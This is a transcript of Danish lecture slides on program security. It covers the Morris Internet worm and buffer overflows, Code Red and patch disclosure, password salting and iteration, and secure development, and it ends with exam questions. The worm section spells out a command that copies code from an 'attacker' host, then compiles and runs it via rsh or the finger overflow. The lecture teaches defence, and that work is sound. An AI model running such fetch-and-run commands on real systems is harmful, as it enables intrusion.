Kursusgang 4: Programsikkerhed. Forholdsregler mod fejl og ondsindede programmer. Internetormen 2. nov Sikreste kur mod orme & vira

Størrelse: px
Starte visningen fra side:

Download "Kursusgang 4: Programsikkerhed. Forholdsregler mod fejl og ondsindede programmer. Internetormen 2. nov Sikreste kur mod orme & vira"

Transkript

1 Kursusgang 4: Programsikkerhed. Forholdsregler mod fejl og ondsindede programmer. Internetormen og buffer-overflow. Code Red og software-patches. Stærke passwords og kryptering. Udvikling af sikker SW Repetition af stoffet indtil nu. Internetormen 2. nov Omfang: Første større sikkerhedshændelse i Internettets historie Vist ca. svarende til nyere hændelser som Code Red, Ninja m.fl. Skadevirkning indirekte: overload af maskiner og netværk pga. selv-kopiering ikke direkte skadelige handlinger som sletning af filer o.l. Udnyttede fire kendte svagheder til indtrængen (overførsel af brohoved) remote shell: tillid til andre maskiner finger: buffer overflow passwordfil: ordbogsangreb sendmail: en eller anden fjel Efter indtrængen af brohoved overførtes hovedprogram. Samt div. yderligere teknikker til at afværge modforholdsregler Orme vs. vira Sikreste kur mod orme & vira Orm: Selvstændigt ("stand alone") program Virus: Programfragment som hæfter sig på et andet program på en måde så kontrollen overgår til fragmentet når programmet startes. Både orme og vira skaber kopier af sig selv på værtsmaskinen eller andre maskiner og søger evt. at starte disse kopier og udfører evt. andre handlinger. Virus bruges også i bredere forstand som samlebetegnelse for vira, orme, m.m. Lad være med at forbinde til Internettet. Men dette er uacceptabelt i netværkssamfundet, både for den enkelte og for statslige og private virksomheder Virksomheder bruger Internettet som infrastruktur internt og eksternt internt: lokalt netværk en del af Internettet eksternt: fx. netbanking, EPJ Internettets åbne forbindelse af millioner af computere giver både risiko-potentialet anvendeligheden

2 Orme og vira Orme og vira er en form for indtrængen: afvikles på angrebet maskine fremmed person udvikler programmet udnytter sårbarhed på angrebet maskine til at få overført og startet programmet op denne Beskyttelse mod orme og vira scenarie: beskyttelse af maskiner/lokalnetværk (Pfleeger figur 1-6) anvendelige services: autentificering (som led i adgangskontrol) andre forudsætninger egne programmer må ikke starte fremmede programmer rsh: baggrund Internettet i 80erne værtsmaskinerne brugte Unix default-konfiguration tillod fjern udførelse af kommandoer via rsh rsh står for remote shell remote: en del af "r-familien" med rsh, rlogin og rcp shell betyder kommando-fortolker interaktiv shell: /bin/sh (Unix) eller command.com og cmd.exe (MS W) syntaks: rsh værtsmaskine kommando, hvor kommando fx. er: rcp swadmin@host1:swupdates swupdates; update backup(swupdates) rcp myname@myhost:1l.c 1l.c; cc -o 1l l1.c;./1l Mange Unix-maskiner var endda konfigureret således at enhver lokal bruger kunne give enhver bruger@maskine adgang

3 Men hvad må man så? Tilladt: fjerne brugere logger ind mod autentificering vilkårlige fjerne brugere udfører udvalgte programmer fjerne brugere udfører følsomme programmer mod autentificering Eksempler på begrænset adgang til programafvikling: Udvalgte metoder stilles til rådighed for fjernmetode-kald fx. baseret på RMI eller Corba Udvalgte programmer stilles til rådighed som del af web-service fx. via HTTPs CGI-grænseflade Data vs. program: Den fjerne bruger angiver data til udvalgte programmer (parametre) Vigtigt at OS og applikation opretholder distinktion data vs. program Programmer afvikles i processer Proces = Kørende program Operativsystemet skal muliggøre flere samtidige processer flere brugere flere applikationer afvikles af samme bruger nogle applikationer bruger flere processer Operativsystemet skal muliggøre at processer kan starte nye processer init login sh mail Procestræer 3 samtidige processer, efter at en bruger er logget på og har startet et mail-program processer startes af andre processer proceshierarki programafvikling i ny proces programafvikling ved overlejring Bruger-ID samme som faderprocessen login starter dog processer med nyt bruger ID init kan opfattes som operativsystemet, eller operativsystemets processkedulator

4 .. fingerd starter sh Operativsystemet adskiller adresserum for forskellige processer fingerd /bin/sh rcp 1l.c; cc -o 1l l1.c;./1l Data kan kun overføres mellem processer ved systemkald Bruger-proces (læse/skrive rettigheder i eget rum) Bruger-proces (læse/skrive rettigheder i eget rum) sh rcp cc l1 Kernen (læse/skriverettigheder overalt) Proces: adresserum + procestabelpost Stak indeholder returadresse til brug ved afslutning af procedurekald stak (procedurestak + miljøvariable) tekst (program) adr../bin/sh rcp rtm@attacker:1l.c 1l.c; cc -o 1l l1.c;./1l Returadresse stak data (alle simple og sammensatte objekter undtagen de som er lokale til procedurer) adr overskriver returadresse adr peger på kodestump: sh rcp.. (oversat til maskinkode) CALL tekst (fingerd's program) Procestabel pid uid filer.. tid Post: Procesdata i kerne... fingerd tjekker ikke længde af streng operativsystem har tilladt at strengen kopieres til adresse som bruges til program data

5 Internet-ormen: hvad kan vi lære? Operativsystemets konfiguration: Autentificering skal altid kræves undtagen til udførelse af udvalgte programmer tilbyd ikke rsh Programmer som tilbyder netværks-services: skal være udviklet med sikkerhed for øje må ikke indeholde (potentielt) buffer overflow tilbyd ikke finger Ordbogsangreb på password-fil skal tages alvorligt (jf. senere i dag) skjul passwordfil Kursusgang 4: Programsikkerhed. Forholdsregler mod fejl og ondsindede programmer. Internetormen og buffer-overflow. Code Red og software-patches. Stærke passwords og kryptering. Udvikling af sikker SW Repetition af stoffet indtil nu. Code Red 12. juli 2001 Angrebsmetode: Udnyttede kendt fejl i MS IIS MS havde udsendte patches som rettede denne o.a. fejl buffer overflow som gav angriber mulighed for at udføre vilkårlig kode med administrator rettigheder Effekt: Alle websider indeholdt teksten HELLO! Welcome to Hacked by Chinese! denial of service angreb bl.a. på spredning til andre maskiner skabelse af bagdør med administrator-rettigheder tre faser af aktivitet i hver måned

6 Pfleeger: Code red: software-opdateringer 47 patchhes til NT / IIS Gartner Group: Antallet af løbende ændringer til MS IIS er så stort, at omkostningen ved at vedligeholde MS ISS bliver uacceptabelt høj Brug af MS IIS frarådes indtil den skrives fundamentalt om Skift til Apache eller iplanet Kilde: Gartner Group 19. september Microsofts reaktion ".. as secure as comparable products from other vendors.. serious vulnerabilities have been found in all Web server products and platforms.. It is a folly to believe that if you switch from one product to another, you are protected.. Instead, the emphasis should be on ensuring safe security practices and making sure that all recommended patches are installed.." Kilde: ComputerWorld online 26. september Ansvar: Code red: andre perspektiver Værtsmaskiner på Internettet med lavt sikkerhedsniveau udgør en risiko for hele Internettet også for værtsmaskiner med højt sikkerhedsniveau Offentliggørelse: Sikkerhedsbrister bliver typisk offentliggjort som begrundelse for patch for at give kredit til de som har fundet fejlen omend normalt først når fejlen er rettet (eller ignoreret) Code Red udnyttede fejl som sikkerhedsfirmaet eeye havde fundet eeye har offentliggjort detaljeret analyse af Code Red MS Security Bulletin 18. juni 2001 ".. What s the scope of the vulnerability? This is a buffer overrun vulnerability. An attacker who successfully exploited this vulnerability could gain complete control over an affected web server. This would give the attacker the ability to take any desired action on the server... Default installations of Windows 2000 Server are vulnerable. IIS 5.0 installs by default as part of Windows 2000 server products, and Idq.dll is installed as part of the IIS 5.0 installation process.... What does the patch do? The patch eliminates the vulnerability by instituting proper input checking in the ISAPI extension... Acknowledgments: Microsoft thanks eeye Digital Security for reporting this issue to us and working with us to protect customers..." Kilde:

7 MS og offentliggørelse af sikkerhedsfejl "Microsoft is committed to protecting customers' information.. However, to do this we need the help of the people who discover security vulnerabilities. No vendor can develop security patches overnight.. Our patches must operate correctly on every single machine. This is a significant engineering challenge under any conditions, but it is even more difficult when details of a vulnerability have been made public before a patch can be developed..... there has traditionally been an unwritten rule among security professionals that the discoverer of a security vulnerability has an obligation to give the vendor an opportunity to correct the vulnerability before publicly disclosing it.. Once customers are protected, public discussion of the vulnerability is entirely in order, and helps the industry at large improve its products. Many security professionals follow these practices, and Microsoft wants to single them out for special thanks. The acknowledgment section of our security bulletins is intended to do this." Kursusgang 4: Programsikkerhed. Forholdsregler mod fejl og ondsindede programmer. Internetormen og buffer-overflow. Code Red og software-patches. Stærke passwords og kryptering. Udvikling af sikker SW Repetition af stoffet indtil nu. Kilde: Stærke passwords og kryptering Passwordfil Internet-ormen benyttede det kendte ordbogsangreb: Gæt at password er ord som forekommer i ordbog Autentificering med passwords bør bl.a. baseres på: at passwords gemmes i krypteret form at brugeren vælger stærke passwords Morris & Thomsens artikel gennemgår historisk udvikling af password-baseret autentificering som underbygger ovenstående principper flere andre gode principper: saltning, iteration Autentificering bl.a. på flerbrugermaskiner baseret på brugernavn + password Det rigtige passwords skal gemmes, for at muliggøre sammenligning med det password brugeren opgiver ved autentificering Mange Unix-systemer gemmer brugernavn + (krypteret) password i /etc/passwd Kryptering af password overflødiggør (eller mindsker) behovet for at hemmeligholde passwordfilen uden kryptering er passwords tilgængelige mindst for administrator og folk med adgang til backup-filer

8 Kryptering af password Ordbogsangreb 0 E brugernavn E vovse (0) 0 E brugernavn E vovse (0) Kryptering af konstant (0) med nøgle (vovse) vovse er passwordet Hvilke krav stilles til krypteringsalgoritmen? vovse passwordfil Vælg ord fra ordbog? Sammenlign med krypteret password Da sammenligning er hurtig er det fordelagtigt at sammenligne med alle krypterede passwords i passwordfilen. Saltning umuliggør "multimatch" af password-gæt Iteration: nøglesøgning mere tidskrævende 0 E brugernavn salt E vovse,salt (0) 0 EEE brugernavn salt E n vovse,salt (0) nøglegen. nøglegen. salt vovse Når brugeren definerer password, genererer tilfældigt tal (salt), som bruges i generering af nøgle salt vovse Iterativ kryptering: ciffertekst fra i'te runde bruges som klartest til (i+1)'te runde Saltet gemmes (ukrypteret) sammen med password Kryptering tager n gange så lang tid umærkeligt for bruger generende for cracker

9 Sammenligning: kryptering af privat nøgle (signaturfil) Kursusgang 4: Programsikkerhed. Forholdsregler mod fejl og ondsindede programmer. Privat nøgle Symm. Symm. Symm. krypt. krypt. krypt. Krypteret privat nøgle Internetormen og buffer-overflow. Code Red og software-patches. Salt Symm. nøgle nøglegen. Password Lighedspunkter: salt iteration Forskelle klartekst = hemmelig nøgle standardisering aht. applikationer Stærke passwords og kryptering. Udvikling af sikker SW Repetition af stoffet indtil nu. Pfleegers bud på udvikling af sikker software Kritikpunkt #1 Struktureret programmering Reviews Risikoanalyse Test Design og fejlhåndtering Tendens til at Pfleeger blot beskriver en traditionel vandfaldsmodel for livscyklus af software test som separat fase efter implementation konfigurationsstyring (change management) med et "change control board" som skal godkende al software Savner diskussion af om vandfaldsmodel (fremfor iterativ udvikling) har særlig berettigelse hvis man prioriterer sikkerhed Konfigurationsstyring

10 Kritikpunkt #2 Kritikpunkt #3 Savner diskussion af hvad der særligt kan gøres for sikkerhed i vandfaldsmodellens faser Design-fasen argumentet synes at være: modularitet er godt for kvalitet i almindelighed, derfor også godt for sikkerhed i særdeleshed særligt sikkerhedsrelevant: at indkapsle delsystemer med højt rettighedsniveau (?) Analyse/specifikationsfasen: Vigtigt at afklare og eksplicitere sikkerhedsmål fx. hvilke oplysninger skal hemmeligholdes Savner diskussion af open source software WWWs vigtigste program er formentlig webserveren Open source webserver Apache benyttes på > 50% alvorlige sikkerhedsfejl få og uden større faktiske konsekvenser Fordel ved open source: potentiale for uafhængigt review identifikation af utilsigtede fejl og indbyggede svagheder fx. tilbage-rapportering til softwareleverandør ikke incitament til "featuritis" og forceret lancering af nye versioner Ulemper ved open source: Manglende indtægtsgrundlag til at finansiere betalt review Manglende indtægtsgrundlag til at finansiere udvikling / features Modstander kan lettere finde svagheder ved at læse kildeteksten Jeg er mest enig i: #1: Høj prioritet til test og review #2: Lav prioritet til formelle metoder #3: "no technique is sure to prevent erroneous software" Kursusgang 4: Programsikkerhed. Forholdsregler mod fejl og ondsindede programmer. Internetormen og buffer-overflow. Code Red og software-patches. Stærke passwords og kryptering. Udvikling af sikker SW Repetition af stoffet indtil nu

11 Eksamensspørgsmål 1. Gør rede for principperne i DES og fordele og ulemper ved DES. 2. Gør rede for fællestræk og forskelle mellem symmetrisk og asymmetrisk kryptering. 3. Skitser principperne i Rijndael og gør rede for fordele og ulemper ved algoritmen. 4. Skitser principperne i RSA og gør rede for fordele og ulemper ved algoritmen. 5. Gør rede for hvorledes kryptering kan bruges til besked-autentificering. (Dvs. message authentication; der tænkes ikke offentlig nøgle-infrastruktur med certifikater m.m.). 6. Gør rede for principperne i offentlig nøgle-infrastruktur. 7. Gør rede for OCES-standarden. 8. Diskuter forebyggelse af sikkerhedsbrud fx. i form af ormeangreb.

Kursusgang 11: Intellektuel ejendomsret og politiske aspekter af it-sikkerhed. Evaluering. Hvad må man? www.it-retten.dk v/ Mads Bryde Andersen

Kursusgang 11: Intellektuel ejendomsret og politiske aspekter af it-sikkerhed. Evaluering. Hvad må man? www.it-retten.dk v/ Mads Bryde Andersen Kursusgang 11:. IT-jura Hvad må man? IT-jura omfatter især tilpasning og fortolkning generel lovgivning: ophavsret, patenter brevhemmelighed.. Men også ny lovgivning: registerlovgivning digital signatur..

Læs mere

IBM Network Station Manager. esuite 1.5 / NSM Integration. IBM Network Computer Division. tdc - 02/08/99 lotusnsm.prz Page 1

IBM Network Station Manager. esuite 1.5 / NSM Integration. IBM Network Computer Division. tdc - 02/08/99 lotusnsm.prz Page 1 IBM Network Station Manager esuite 1.5 / NSM Integration IBM Network Computer Division tdc - 02/08/99 lotusnsm.prz Page 1 New esuite Settings in NSM The Lotus esuite Workplace administration option is

Læs mere

DET KONGELIGE BIBLIOTEK NATIONALBIBLIOTEK OG KØBENHAVNS UNIVERSITETS- BIBLIOTEK. Index

DET KONGELIGE BIBLIOTEK NATIONALBIBLIOTEK OG KØBENHAVNS UNIVERSITETS- BIBLIOTEK. Index DET KONGELIGE Index Download driver... 2 Find the Windows 7 version.... 2 Download the Windows Vista driver.... 4 Extract driver... 5 Windows Vista installation of a printer.... 7 Side 1 af 12 DET KONGELIGE

Læs mere

FairSSL Fair priser fair support

FairSSL Fair priser fair support Small Business Server 2011 SSL certifikat administration Følgende vejledning beskriver hvordan man installere et certifikat på en SBS 2011 server. Ved bestilling af certifikater til Small Business Server

Læs mere

Hackingens 5 faser. Kim Elgaard, Solution Engineer, Dubex A/S. 21. marts 2017

Hackingens 5 faser. Kim Elgaard, Solution Engineer, Dubex A/S. 21. marts 2017 Hackingens 5 faser Kim Elgaard, Solution Engineer, Dubex A/S 21. marts 2017 Agenda Angrebs vectorer Hackingens faser, samt beskyttelsen Hverdagseksempler Hvad kan vi gøre Praktiske anbefalinger Live demo

Læs mere

FairSSL Fair priser fair support

FairSSL Fair priser fair support Small Business Server 2003 Certifikat administration Følgende vejledning beskriver hvordan man vælger hvilke adresser der skal være i ens SBS 2003 SSL certifikat. For support og hjælp til anvendelsen af

Læs mere

Processer. DS kursusgang nr. 2: Procestræer. ps: Vis processer

Processer. DS kursusgang nr. 2: Procestræer. ps: Vis processer DS kursusgang nr. 2: Processer 1. Definition af processer/tråde? eksemplificeret med fork() og exec() (procesdannelse i C under unix) 2. C vs. Java (overordnet + funktioner) 3. Processer vs. tråde: Server:

Læs mere

FairSSL Fair priser fair support

FairSSL Fair priser fair support Small Business Server 2008 SSL certifikat administration Følgende vejledning beskriver hvordan man installere et certifikat på en SBS 2008 server. Ved bestilling af certifikater til Small Business Server

Læs mere

FairSSL Fair priser fair support

FairSSL Fair priser fair support Microsoft IIS 6 Certifikat administration Følgende vejledning beskriver hvordan man installere et certifikat på en IIS 6 For support og hjælp til anvendelsen af denne vejledning kan du kontakte FairSSL

Læs mere

CFCS Beretning Center for Cybersikkerhed.

CFCS Beretning Center for Cybersikkerhed. Center for Cybersikkerheds Beretning 2017 Center for Cybersikkerhed www.cfcs.dk 2 Cybertruslen - - - - - - - Center for Cybersikkerheds indsatser i 2017 - rådet. Det er centerets mission at styrke beskyttelsen

Læs mere

Portal Registration. Check Junk Mail for activation . 1 Click the hyperlink to take you back to the portal to confirm your registration

Portal Registration. Check Junk Mail for activation  . 1 Click the hyperlink to take you back to the portal to confirm your registration Portal Registration Step 1 Provide the necessary information to create your user. Note: First Name, Last Name and Email have to match exactly to your profile in the Membership system. Step 2 Click on the

Læs mere

DAU REMOTE ACCESS LØSNINGSMULIGHEDER OG TEKNOLOGIER MED REMOTE ACCESS JOHN AMMENTORP

DAU REMOTE ACCESS LØSNINGSMULIGHEDER OG TEKNOLOGIER MED REMOTE ACCESS JOHN AMMENTORP DAU REMOTE ACCESS LØSNINGSMULIGHEDER OG TEKNOLOGIER MED REMOTE ACCESS JOHN AMMENTORP AGENDA 01 Kort præsentation 02 Behov i forbindelse med de 4 dimensioner 03 Koncept for sikker forbindelser 04 Netværkssikkerhed

Læs mere

DK - Quick Text Translation. HEYYER Net Promoter System Magento extension

DK - Quick Text Translation. HEYYER Net Promoter System Magento extension DK - Quick Text Translation HEYYER Net Promoter System Magento extension Version 1.0 15-11-2013 HEYYER / Email Templates Invitation Email Template Invitation Email English Dansk Title Invitation Email

Læs mere

Vina Nguyen HSSP July 13, 2008

Vina Nguyen HSSP July 13, 2008 Vina Nguyen HSSP July 13, 2008 1 What does it mean if sets A, B, C are a partition of set D? 2 How do you calculate P(A B) using the formula for conditional probability? 3 What is the difference between

Læs mere

Status på det trådløse netværk

Status på det trådløse netværk Status på det trådløse netværk Der er stadig problemer med det trådløse netværk, se status her: http://driftstatus.sdu.dk/?f=&antal=200&driftid=1671#1671 IT-service arbejder stadig med at løse problemerne

Læs mere

Project Step 7. Behavioral modeling of a dual ported register set. 1/8/ L11 Project Step 5 Copyright Joanne DeGroat, ECE, OSU 1

Project Step 7. Behavioral modeling of a dual ported register set. 1/8/ L11 Project Step 5 Copyright Joanne DeGroat, ECE, OSU 1 Project Step 7 Behavioral modeling of a dual ported register set. Copyright 2006 - Joanne DeGroat, ECE, OSU 1 The register set Register set specifications 16 dual ported registers each with 16- bit words

Læs mere

HELLO INSTALLATIONS GUIDE - DANSK RACKPEOPLE

HELLO INSTALLATIONS GUIDE - DANSK RACKPEOPLE HELLO INSTALLATIONS GUIDE - DANSK RACKPEOPLE 1 Tekniske Krav 1.1 Hardware krav: En skærm gerne med touch Hvis skærmen ikke har touch, skal du bruge et tastatur og en mus Webcam Gerne i HD En ekstern lydenhed

Læs mere

Installation af web-konfigurationsprogrammer

Installation af web-konfigurationsprogrammer Installation af web-konfigurationsprogrammer 23. marts 2015 MODST/JAMAN 1. Generelt Denne vejledning vedrører installation af web-konfigurationsprogrammer, som anvendes til at vedligeholde (konfigurere)

Læs mere

Brug sømbrættet til at lave sjove figurer. Lav fx: Få de andre til at gætte, hvad du har lavet. Use the nail board to make funny shapes.

Brug sømbrættet til at lave sjove figurer. Lav fx: Få de andre til at gætte, hvad du har lavet. Use the nail board to make funny shapes. Brug sømbrættet til at lave sjove figurer. Lav f: Et dannebrogsflag Et hus med tag, vinduer og dør En fugl En bil En blomst Få de andre til at gætte, hvad du har lavet. Use the nail board to make funn

Læs mere

extreme Programming Kunders og udvikleres menneskerettigheder

extreme Programming Kunders og udvikleres menneskerettigheder extreme Programming Software Engineering 13 1 Kunders og udvikleres menneskerettigheder Kunder: At sætte mål og få projektet til at følge dem At kende varighed og pris At bestemme softwarefunktionalitet

Læs mere

DSB s egen rejse med ny DSB App. Rubathas Thirumathyam Principal Architect Mobile

DSB s egen rejse med ny DSB App. Rubathas Thirumathyam Principal Architect Mobile DSB s egen rejse med ny DSB App Rubathas Thirumathyam Principal Architect Mobile Marts 2018 AGENDA 1. Ny App? Ny Silo? 2. Kunden => Kunderne i centrum 1 Ny app? Ny silo? 3 Mødetitel Velkommen til Danske

Læs mere

FleeDa (DBK Fleetmap Database) Installationsvejledning til installation af VPN og FleeDa klient på egen PC (Juli 2017)

FleeDa (DBK Fleetmap Database) Installationsvejledning til installation af VPN og FleeDa klient på egen PC (Juli 2017) FleeDa (DBK Fleetmap Database) Installationsvejledning til installation af VPN og FleeDa klient på egen PC (Juli 2017) Page 1 of 12 Indhold 1 Adgang til FleeDa... 3 1.1 HW og SW forudsætninger... 3 1.2

Læs mere

Trolling Master Bornholm 2015

Trolling Master Bornholm 2015 Trolling Master Bornholm 2015 (English version further down) Panorama billede fra starten den første dag i 2014 Michael Koldtoft fra Trolling Centrum har brugt lidt tid på at arbejde med billederne fra

Læs mere

Kryptologi 101 (og lidt om PGP)

Kryptologi 101 (og lidt om PGP) Kryptologi 101 (og lidt om PGP) @jchillerup #cryptopartycph, 25. januar 2015 1 / 27 Hvad er kryptologi? define: kryptologi En gren af matematikken, der blandt andet handler om at kommunikere sikkert over

Læs mere

Engelsk. Niveau D. De Merkantile Erhvervsuddannelser September Casebaseret eksamen. og

Engelsk. Niveau D. De Merkantile Erhvervsuddannelser September Casebaseret eksamen.  og 052431_EngelskD 08/09/05 13:29 Side 1 De Merkantile Erhvervsuddannelser September 2005 Side 1 af 4 sider Casebaseret eksamen Engelsk Niveau D www.jysk.dk og www.jysk.com Indhold: Opgave 1 Presentation

Læs mere

Vores mange brugere på musskema.dk er rigtig gode til at komme med kvalificerede ønsker og behov.

Vores mange brugere på musskema.dk er rigtig gode til at komme med kvalificerede ønsker og behov. På dansk/in Danish: Aarhus d. 10. januar 2013/ the 10 th of January 2013 Kære alle Chefer i MUS-regi! Vores mange brugere på musskema.dk er rigtig gode til at komme med kvalificerede ønsker og behov. Og

Læs mere

Backup Applikation. Microsoft Dynamics C5 Version 2008. Sikkerhedskopiering

Backup Applikation. Microsoft Dynamics C5 Version 2008. Sikkerhedskopiering Backup Applikation Microsoft Dynamics C5 Version 2008 Sikkerhedskopiering Indhold Sikkerhedskopiering... 3 Hvad bliver sikkerhedskopieret... 3 Microsoft Dynamics C5 Native database... 3 Microsoft SQL Server

Læs mere

Trolling Master Bornholm 2015

Trolling Master Bornholm 2015 Trolling Master Bornholm 2015 (English version further down) Sæsonen er ved at komme i omdrejninger. Her er det John Eriksen fra Nexø med 95 cm og en kontrolleret vægt på 11,8 kg fanget på østkysten af

Læs mere

Citrix CSP og Certificate Store Provider

Citrix CSP og Certificate Store Provider Project Name Document Title TDC Citrix Citrix og Certificate Store Provider Version Number 1.0 Status Release Author jkj Date 5-10-2006 Trademarks All brand names and product names are trademarks or registered

Læs mere

Rejse Logi. Logi - Resultat. Logi - Booking. At spørge efter vej til et logi. ... et værelse som man kan leje?... a room to rent?

Rejse Logi. Logi - Resultat. Logi - Booking. At spørge efter vej til et logi. ... et værelse som man kan leje?... a room to rent? - Resultat Hvor kan jeg finde? At spørge efter vej til et logi Where can I find?... et værelse som man kan leje?... a room to rent? type... et vandrehjem?... a hostel? type... et hotel?... a hotel? type...

Læs mere

Vejledning til at tjekke om du har sat manuel IP på din computer.

Vejledning til at tjekke om du har sat manuel IP på din computer. Indhold Vejledning til at, komme på nettet. (DANSK)... 2 Gælder alle systemer.... 2 Vejledning til at tjekke om du har sat manuel IP på din computer.... 2 Windows 7... 2 Windows Vista... 2 Windows XP...

Læs mere

E-PAD Bluetooth hængelås E-PAD Bluetooth padlock E-PAD Bluetooth Vorhängeschloss

E-PAD Bluetooth hængelås E-PAD Bluetooth padlock E-PAD Bluetooth Vorhängeschloss E-PAD Bluetooth hængelås E-PAD Bluetooth padlock E-PAD Bluetooth Vorhängeschloss Brugervejledning (side 2-6) Userguide (page 7-11) Bedienungsanleitung 1 - Hvordan forbinder du din E-PAD hængelås med din

Læs mere

Dean's Challenge 16.november 2016

Dean's Challenge 16.november 2016 O Dean's Challenge 16.november 2016 The pitch proces..with or without slides Create and Practice a Convincing pitch Support it with Slides (if allowed) We help entrepreneurs create, train and improve their

Læs mere

Bilag. Resume. Side 1 af 12

Bilag. Resume. Side 1 af 12 Bilag Resume I denne opgave, lægges der fokus på unge og ensomhed gennem sociale medier. Vi har i denne opgave valgt at benytte Facebook som det sociale medie vi ligger fokus på, da det er det største

Læs mere

Meget formel, modtager har en meget speciel titel som skal bruges i stedet for deres navne

Meget formel, modtager har en meget speciel titel som skal bruges i stedet for deres navne - Åbning Engelsk Dansk Dear Mr. President, Kære Hr. Direktør, Meget formel, modtager har en meget speciel titel som skal bruges i stedet for deres navne Dear Sir, Formel, mandelig modtager, navn ukendt

Læs mere

Mobil Awareness 2011 CSIS Security Group

Mobil Awareness 2011 CSIS Security Group Mobil Awareness 2011 CSIS Security Group Peter Kruse (pkr@csis.dk) Head of CSIS ecrime and Research & Intelligence Unit PGP-ID: 0x715FB4BD Fingerprint: E1A6 7FA1 F11B 4CB5 E79F 1E14 EE9F 9ADB 715F B4BD

Læs mere

Meget formel, modtager har en meget speciel titel som skal bruges i stedet for deres navne

Meget formel, modtager har en meget speciel titel som skal bruges i stedet for deres navne - Åbning Dansk Engelsk Kære Hr. Direktør, Dear Mr. President, Meget formel, modtager har en meget speciel titel som skal bruges i stedet for deres navne Kære Hr., Formel, mandelig modtager, navn ukendt

Læs mere

Hvordan griber du moderniseringsprocessen an? Peter Janum Sode Senior Security Consultant pso@dubex.dk

Hvordan griber du moderniseringsprocessen an? Peter Janum Sode Senior Security Consultant pso@dubex.dk Hvordan griber du moderniseringsprocessen an? Peter Janum Sode Senior Security Consultant pso@dubex.dk Overordnet fremgangsmåde Identificér områder der hører under fundamental sikkerhed i risikovurderingen.

Læs mere

DANSK INSTALLATIONSVEJLEDNING VLMT500 ADVARSEL!

DANSK INSTALLATIONSVEJLEDNING VLMT500 ADVARSEL! DANSK INSTALLATIONSVEJLEDNING VLMT500 Udpakningsinstruktioner Åben indpakningen forsigtigt og læg indholdet på et stykke pap eller en anden beskyttende overflade for at undgå beskadigelse. Kontroller at

Læs mere

Trolling Master Bornholm 2016 Nyhedsbrev nr. 3

Trolling Master Bornholm 2016 Nyhedsbrev nr. 3 Trolling Master Bornholm 2016 Nyhedsbrev nr. 3 English version further down Den første dag i Bornholmerlaks konkurrencen Formanden for Bornholms Trollingklub, Anders Schou Jensen (og meddomer i TMB) fik

Læs mere

QUICK START Updated:

QUICK START Updated: QUICK START Updated: 24.08.2018 For at komme hurtigt og godt igang med dine nye Webstech produkter, anbefales at du downloader den senest opdaterede QuickStart fra vores hjemmeside: In order to get started

Læs mere

PARALLELIZATION OF ATTILA SIMULATOR WITH OPENMP MIGUEL ÁNGEL MARTÍNEZ DEL AMOR MINIPROJECT OF TDT24 NTNU

PARALLELIZATION OF ATTILA SIMULATOR WITH OPENMP MIGUEL ÁNGEL MARTÍNEZ DEL AMOR MINIPROJECT OF TDT24 NTNU PARALLELIZATION OF ATTILA SIMULATOR WITH OPENMP MIGUEL ÁNGEL MARTÍNEZ DEL AMOR MINIPROJECT OF TDT24 NTNU OUTLINE INEFFICIENCY OF ATTILA WAYS TO PARALLELIZE LOW COMPATIBILITY IN THE COMPILATION A SOLUTION

Læs mere

Operation Manual SMS Air Conditioner Remote Controller Model No.: SR-001

Operation Manual SMS Air Conditioner Remote Controller Model No.: SR-001 Operation Manual SMS Air Conditioner Remote Controller Model No.: SR-001 Ls venligst denne instruktions manual igennem inden brug af produktet Thank you for purchasing our product. This smart unit is not

Læs mere

Installation af web-konfigurationsprogrammer

Installation af web-konfigurationsprogrammer Installation af web-konfigurationsprogrammer 23. januar 2015 MODST/JAMAN 1. Generelt Denne vejledning vedrører installation af web-konfigurationsprogrammer, som anvendes til at vedligeholde (konfigurere)

Læs mere

Velkommen VI BYGGER DANMARK MED IT

Velkommen VI BYGGER DANMARK MED IT Velkommen VI BYGGER DANMARK MED IT Som specialister i itinfrastruktur vil vi være med til at forme et endnu bedre Danmark. Sammen med vores kunder vil vi udvikle løsninger, som næste generation kan være

Læs mere

Kursusgang 3: Digital signatur. Den danske OCESstandard. Målsætning for digital signatur. Signatur (digital & alm. underskrift) Sikkerhedsmål

Kursusgang 3: Digital signatur. Den danske OCESstandard. Målsætning for digital signatur. Signatur (digital & alm. underskrift) Sikkerhedsmål Kursusgang 3: Digital signatur. Den danske OCESstandard. Målsætning for digital signatur Digital Signatur Hashing x.509-certifikater Kvantekryptering Den danske OCES-standard Udveksling af tekst på en

Læs mere

NEMT OG EFFEKTIVT - Ejendomsadministration

NEMT OG EFFEKTIVT - Ejendomsadministration Ny Unik Bolig 4 version på trapperne Det er nu ca. 2 år siden, at første version af Unik Bolig 4 blev lanceret. Siden da er der blevet arbejdet hårdt på at forbedre versionen og finde på nye smarte ting

Læs mere

OS2faktor. Windows Credential Providers. Version: Date: Author: BSG

OS2faktor. Windows Credential Providers. Version: Date: Author: BSG OS2faktor Windows Credential Providers Version: 1.0.0 Date: 17.03.2019 Author: BSG Indhold 1 Indledning... 3 1.1 Komponenter... 3 2 Forudsætninger... 3 3 Installation og konfiguration af OS2faktor Proxy...

Læs mere

Vejledning til Sundhedsprocenten og Sundhedstjek

Vejledning til Sundhedsprocenten og Sundhedstjek English version below Vejledning til Sundhedsprocenten og Sundhedstjek Udfyld Sundhedsprocenten Sæt mål og lav en handlingsplan Book tid til Sundhedstjek Log ind på www.falckhealthcare.dk/novo Har du problemer

Læs mere

FairSSL Fair priser fair support

FairSSL Fair priser fair support Exchange 2010 SSL certifikat administration Følgende vejledning beskriver hvordan man vælger hvilke adresser der skal være i ens Exchange 2010 SAN SSL certifikat. Derudover er der tekniske guides til at

Læs mere

LUDUS WEB. Installations- og konfigurations-vejledning. Den 7. april 2009. J.nr.: 4004 V0624 09

LUDUS WEB. Installations- og konfigurations-vejledning. Den 7. april 2009. J.nr.: 4004 V0624 09 LUDUS WEB Installations- og konfigurations-vejledning Den 7. april 2009 J.nr.: 4004 V0624 09 CSC Scandihealth A/S, P.O. Pedersens Vej 2, DK-8200 Århus N Tlf. +45 3614 4000, fax +45 3614 7324, www.scandihealth.dk,

Læs mere

OS2faktor. AD FS Connector Vejledning. Version: Date: Author: BSG

OS2faktor. AD FS Connector Vejledning. Version: Date: Author: BSG OS2faktor AD FS Connector Vejledning Version: 1.3.0 Date: 16.04.2019 Author: BSG Indhold 1 Indledning... 3 2 Forudsætninger... 4 2.1 Connector softwaren... 4 2.2 API nøgle... 4 3 Installation... 5 4 Konfiguration...

Læs mere

TDCs Signaturserver. 11/05 - Version 1.0 2005 TDC Erhverv Sikkerhed og certifikater

